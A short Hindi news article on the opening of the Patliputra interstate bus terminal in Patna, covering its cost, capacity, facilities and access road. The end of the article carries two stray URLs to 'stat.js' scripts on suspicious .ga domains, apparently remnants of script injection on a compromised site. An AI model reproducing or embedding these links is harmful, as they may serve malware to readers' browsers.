बिहार में पहला अंतरराज्यीय बस टर्मिनल को जनता के लिए खोल दिया गया है। बीते दिन मुख्यमंत्री नीतीश कुमार ने 339 करोड़ रुपए की लागत से बने हाईटेक बस टर्मिनल का उद्घाटन किया है। जिसमें प्रतिदिन 3000 बसों का परिचालन होगा एवं डेढ़ लाख यात्री प्रतिदिन करेंगे सफर।

यात्रियों के लिए विश्वस्तरीय सुविधाएं देते हुए इस बस टर्मिनल बुजुर्गों एवं बच्चों के लिए स्वचालित सिंढीया बनाई गई। साथ साथ सभी ब्लॉक में लिफ्ट एवं आराम करने के लिए विश्राम गृह बनाया गया है। बता दें कि एयरपोर्ट के तर्ज पर बना यह बस टर्मिनल 25 एकड़ में फैला हुआ है।

इस हाईटेक बस स्टैंड में 7 और 8 फ्लोर के चार ब्लॉक बनाए गए सभी ब्लॉक के दूसरे फ्लोर पर छोटी गाड़ियों की पार्किंग की व्यवस्था भी की गई है। इस बस टर्मिनल का नाम पाटलिपुत्र बस टर्मिनल दिया गया है।

पटना गया रोड पर बैरिया के पास बना यह अंतर्राज्यीय बस टर्मिनल 2016 के दिसंबर महीने से निर्माणाधीन था। पथ निर्माण विभाग के अपर सचिव ने बताया कि 15 दिनों के भीतर जीरोमाइल से बस टर्मिनल पहुंचने के लिए 8 लेन की सड़क तैयार हो जाएगा जिसके बाद बसों का परिचालन भी शुरू कर दिया जाएगा।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.